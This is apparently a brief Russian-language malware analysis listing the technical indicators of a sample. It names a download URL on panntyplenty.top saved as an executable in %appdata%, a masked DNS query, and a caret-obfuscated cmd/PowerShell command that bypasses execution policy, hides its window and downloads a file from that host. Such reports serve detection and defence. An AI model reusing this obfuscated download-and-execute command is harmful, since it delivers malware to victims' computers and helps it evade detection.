Техническая информация
- http://panntyplenty.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWeRS^he^LL.E^x^E^ -^Exe^CuTiOnPOLIcy byp^as^S -N^O^PRo^f^ILE -w^I^ND^OwStyLe^ ^Hi^dDe^n^ ^(N^E^W-ObjEcT ^SysT^eM.^n^ET.^w^Eb^Cl^ieNt).d^OWN^L^oA^DfI^L^E(^'http://panntyplenty...
- DNS ASK pa####plenty.top
- '<SYSTEM32>\cmd.exe' /c "pOWeRS^he^LL.E^x^E^ -^Exe^CuTiOnPOLIcy byp^as^S -N^O^PRo^f^ILE -w^I^ND^OwStyLe^ ^Hi^dDe^n^ ^(N^E^W-ObjEcT ^SysT^eM.^n^ET.^w^Eb^Cl^ieNt).d^OWN^L^oA^DfI^L^E(^'http://panntyplenty...' (со скрытым окном)